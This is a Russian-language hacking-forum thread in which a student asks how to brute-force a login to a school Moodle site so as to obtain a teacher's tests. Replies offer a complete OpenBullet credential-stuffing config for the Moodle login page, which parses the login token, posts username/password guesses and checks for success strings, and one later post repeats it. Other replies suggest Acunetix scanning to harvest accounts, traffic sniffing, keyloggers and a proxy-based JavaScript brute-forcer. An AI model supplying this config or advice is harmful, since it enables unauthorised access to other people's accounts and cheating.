• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Подскажите софтину для брута учетки на сайте на Moodle.

10.02.2020
2
0
BIT
0
Достала эта математичка, хз откуда берет свои тесты. А на этом *сайте* никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.
 

anal_bunt

One Level
29.04.2020
7
1
BIT
0
Ставишь акунетикс, делаешь шаб для логина под твоей учеткой и начинай сканировать сайт, увидишь много всего интересного для последующего взлома. Увидишь возможности для того, чтобы собрать учетки ;)
 

but43r

Red Team
23.12.2019
19
2
BIT
0
Последнее редактирование:

yky

Green Team
31.12.2019
100
41
BIT
1
Скачиваешь OpenBullet вставляешь конфиг:
REQUEST GET "https*://moodle.org/*login/index.php"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"

REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"

Прокси по желанию можно взять или

P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
 
Последнее редактирование:

shooter44

New member
11.05.2020
1
0
BIT
0
Извините конечно, я суть не понял но очень нужен взлом Мудла ваш метод достает базу данных?
 

Кудрявый

Green Team
06.03.2017
14
19
BIT
0
Проще снифать трафик или кейлогеры делать.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.

Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
 
27.06.2022
1
0
BIT
0
Скачиваешь OpenBullet вставляешь конфиг:
REQUEST GET "https*://moodle.org/*login/index.php"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"

REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"

Прокси по желанию можно взять или

P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
Так , а для тупых можно такойже но с уже извесным логином и просто подбор паролей?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!